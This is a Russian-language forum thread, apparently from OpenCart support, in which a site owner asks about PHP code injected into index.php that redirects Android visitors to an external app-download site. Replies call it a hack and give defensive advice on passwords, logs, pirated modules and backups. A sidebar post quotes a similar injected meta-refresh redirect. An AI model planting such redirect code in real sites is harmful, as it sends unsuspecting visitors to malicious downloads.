ephiop

Помогите узнать, что это такое.

Рекомендуемые сообщения

ephiop    0

в индекс вставляет код 

<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
if(stripos("***$ua",'android') !== false){
header("Location: http://load-app.org/m/?mobile_version=CleanRu");
die();
}
?>
что это и как предотвратить? Изменено пользователем afwollis
пппппппппппппп [code]

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
halfhope    154

У Вас взломали сайт, ищите дыру, закрывайте.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
sv2109    422

если зашли с андроида то перекидывает на

http://load-app.org/m/?mobile_version=CleanRu
похоже сайт загрузки какого-то приложения. 

я когда исправлял вам ошибку на вашем сайте не обратил на это внимание, что это вредоносный код, подумал что это вы сами что-то  добавили

 

пс удалить все, и да, искать дыры в сайте + менять все пароли на фтп и в админку, вспоминать что устанавливали в последнее время, какие модули и кому доступ давали к сайту.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
ephiop    0

это поисковый запрос, я это читал,

 

понятно что дырка, где ???

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
AlexDW    768

99% всех причин подобных радостей - использование платных дополнений на халяву (здравствуй, варез!), раздача доступа кому попало, слабые/идиотские пароли и банальные вирусы на компе, с которого осуществляется доступ.

 

Изредка - могут получить доступ через брешь на соседнем сайте у хостера.

 

Насчет того "где?!" - смотреть логи сайта и FTP

 

Чтоб такого не было - исключить практику вареза, если таковая имеется. Ограничить доступ FTP по ip, использовать актуальный и адекватно настроенный антивирус, не раздавать доступ кому попало, если необходимость есть - резать пользователя в правах по максимуму, только то что необходимо. Не заходить с "левых" машин, либо использовать для этого специальный урезанный в правах аккаунт. Делать нормальные пароли, а не вида 12345.

 

Сильно желательно регулярно делать бекап файлов и БД

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Похожий контент

    • От kaaspb
      Добрый день
      сейчас начитался форума и понял,что столкнулся с проблемой. с которой многие сталкивались: ничего не понимая в вопросах сайтостроительства заказал сайт фрилансеру, он написал сколько это будет стоить,я оплатил, он все вроде бы сделал, а сейчас с ним нет связи. И теперь не понимаю,что покупалось для нашего сайта, что он использовал.... нет ли дыр или троянов каких на сайте
       
      есть ли специалисты по безопасности проверить сайт, естественно заранее договорившись об оплате
      спасибо
    • От storagevash
      Ещё прежде не сталкивался с вопросами безопасности ранее. У меня одна база данных на два  сайта, оба на ocstore 1.5.5.1.2.  Один посложнее  весь в модулях, другой облегчённый. То на одном, то на другом  начинаются вредоносные ставки во все страницы

      <meta http-equiv="refresh" content="0;url=http://ww2.googlejavascript.com/?folio=7POJ4E717" />
       
       сканирую бесплатными сервисами, но не могу  найти, что именно вписывает вредоносные коды. Как найти виновника?! Эту дырку в сайте. Что порекомендуете?
       
      сейчас  www.2450210.ru - полностью атакован. А главный на той же базе www.efler.ru - работает. И сканеры не видят там  проблем.  Причём на 2450210  я  уже  перезалил с исходника  окстор  все  javescript , отключил все модули. куда  мог  попасть вредоносный код?
    • От Absalem
      Всем привет!
      Пациент - *******
      На главной странице с правой стороны маленькие баннеры, при клике по любому из них в новой вкладке открывается целевая страница, а в предыдущей вкладке вместо моего исходного сайта происходит непонятный редирект, который ведёт то на лингвалео, то на озон, то ещё куда (срабатывает по одному разу на устройство/браузер).
      Не могу найти код-вредитель, даже проверила айболитом - ничего не находит :(
      Помогите, пожалуйста!
    • От sashenka
      Добрый день, потихоньку изучаю опенкарт 1.5.6 на своей сайте. Столкнулась со странной картиной пару дней назад.В  админ. панели  раздел "Клиенты онлайн" отображаются Ip посетителей и адреса страниц сайта где они находятся. Всегда там были страницы моего сайта, а теперь мелькают урлы сторонних не связанных с моим по тематике разнообразных сайтов.

      Обратилась к хостингу на предмет попыток взлома и наличия вредоносного на сайте. Хостинг сказал все чисто. 

      Что это такое как с этим бороться? Буду рада любым ответам и помощи. Спасибо.

    • От sashenka
      Добрый день, потихоньку изучаю опенкарт 1.5.6 на своей сайте. Столкнулась со странной картиной пару дней назад.В  админ. панели  раздел "Клиенты онлайн" отображаются Ip посетителей и адреса страниц сайта где они находятся. Всегда там были страницы моего сайта, а теперь мелькают урлы сторонних не связанных с моим по тематике разнообразных сайтов.
      Обратилась к хостингу на предмет попыток взлома и наличия вредоносного на сайте. Хостинг сказал все чисто. 
      Что это такое как с этим бороться? Буду рада любым ответам и помощи. Спасибо.
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу